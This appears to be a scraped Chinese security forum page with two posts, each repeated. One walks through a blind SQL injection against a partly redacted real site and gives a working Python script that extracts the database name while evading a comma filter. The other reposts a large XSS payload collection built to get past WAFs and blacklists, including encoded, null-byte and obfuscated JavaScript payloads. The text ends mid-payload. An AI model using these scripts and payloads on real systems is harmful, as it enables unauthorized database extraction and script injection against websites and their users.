这尼玛就很尴尬了...加上headers再跑下...

后面redfree说 注释方式有问题…我擦…以前是个开发狗没用过--注入,我多余的把—后面的%20删了,原来--后面后面是个单引号...也就是说--不是注释了。
查了下mysql手册 注意--注释风格要求你在--以后至少有一个空格!MySQL3.23.3和以上版本支持'--'注释风格,只要注释跟在一个空格之后。

好吧,加上%20果断就跑出来了...其实用%23可以不用加空格...
脚本如下:#-[i]- coding:utf-8 -[/i]-

import requests

payload = list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_')

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,[i]/[/i];q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}

user = ''
num = 9
strings = ''
for x in range(1,10):
for y in payload:
y = y+strings
url = "http://[b][i].[/b][/i].[b].[/b]/**/user/buyerChannel/indexNew?buyer_id=25966%%27)+AND+substring(database()+from+%d)=%%27%s%%27%%23&_=1466596215826" % (num,y)
try:
response = requests.get(url,headers=headers,timeout=5,verify=False)
if response.content.find('****') != -1:#改成你想查找的关键词

strings = y
num -= 1
print url
break
except Exception,e:
pass
print '当前数据库名称为: ',
print strings 查看全部
#先感谢下@莲藕炖猪蹄和@redfree。姿势不在多,只要你的姿势正确欢迎来给我普及新知识。绝对虚心求教。

再就是标题党一回,今天碰到一个注入,过滤了逗号,sqlmap并没有跑出来,习惯性装逼手注一下。

过滤逗号的情况下布尔型注入可以用substring这个函数,正常用法substring(@@version,1,1)=5,猜@@version的第一位是5。

但是这里过滤了逗号,前段时间@莲藕炖猪蹄 大牛刚给我普及了一下,substring不用逗号也可以猜解的用法。

substring(database() from 1) 这样是猜解完整的数据库名字。

简单用本地数据库演示下。
 
 

1.jpg
一开始length(database())得到9

2.png
接下来猜数据库名称 substring(database() from 9) 这样猜解数据库名称最后一个字符
并没有猜出最后一位是什么字符…这特么就很尴尬了....刚开始只知道过滤逗号,当时就想到了应该是还过滤了什么关键词....

怎么判断过滤了什么字符?简单判断:length下当前的注入的语句,如果过滤了注入语句中的某个关键词肯定返回false。
已知DATA SIZE为3453为True。
这里证明没有过滤什么东西...

这个时候@redfree那边说他注入出来了...语法是一样的…我擦....
检查下python代码,redfree说他那边加了headers,如果不加headers就返回False...
这尼玛就很尴尬了...加上headers再跑下...

后面redfree说 注释方式有问题…我擦…以前是个开发狗没用过--注入,我多余的把—后面的%20删了,原来--后面后面是个单引号...也就是说--不是注释了。
查了下mysql手册 注意--注释风格要求你在--以后至少有一个空格!MySQL3.23.3和以上版本支持'--'注释风格,只要注释跟在一个空格之后。

好吧,加上%20果断就跑出来了...其实用%23可以不用加空格...

脚本如下:
#-[i]- coding:utf-8 -[/i]-

import requests

payload = list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_')

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,[i]/[/i];q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}

user = ''
num = 9
strings = ''
for x in range(1,10):
for y in payload:
y = y+strings
url = "http://[b][i].[/b][/i].[b].[/b]/**/user/buyerChannel/indexNew?buyer_id=25966%%27)+AND+substring(database()+from+%d)=%%27%s%%27%%23&_=1466596215826" % (num,y)
try:
response = requests.get(url,headers=headers,timeout=5,verify=False)
if response.content.find('****') != -1:#改成你想查找的关键词

strings = y
num -= 1
print url
break
except Exception,e:
pass
print '当前数据库名称为: ',
print strings

Xss Payload收(多场景bypass)

Mosuan 发表了文章 • 10 个评论 • 1033 次浏览 • 2016-09-05 18:35 • 来自相关话题

转自:d3adend.org/xss/ghettoBypass挺全的,我认真了下,还可以。
_____ _ _ _ __ _______ _____ _____ _ _ _ _
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = ).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
[quote] = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2[/quote]

<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/[i]anything[/i]/res/[i]here[/i]/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[url=0]alt+lang[/url]>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric crazyness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script> 查看全部
 转自:d3adend.org/xss/ghettoBypass
挺全的,我认真了下,还可以。
_____ _          _   _          __   _______ _____   _____ _                _       _               _   
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = ).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
[quote] = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2[/quote]

<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/[i]anything[/i]/res/[i]here[/i]/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[url=0]alt+lang[/url]>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric crazyness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[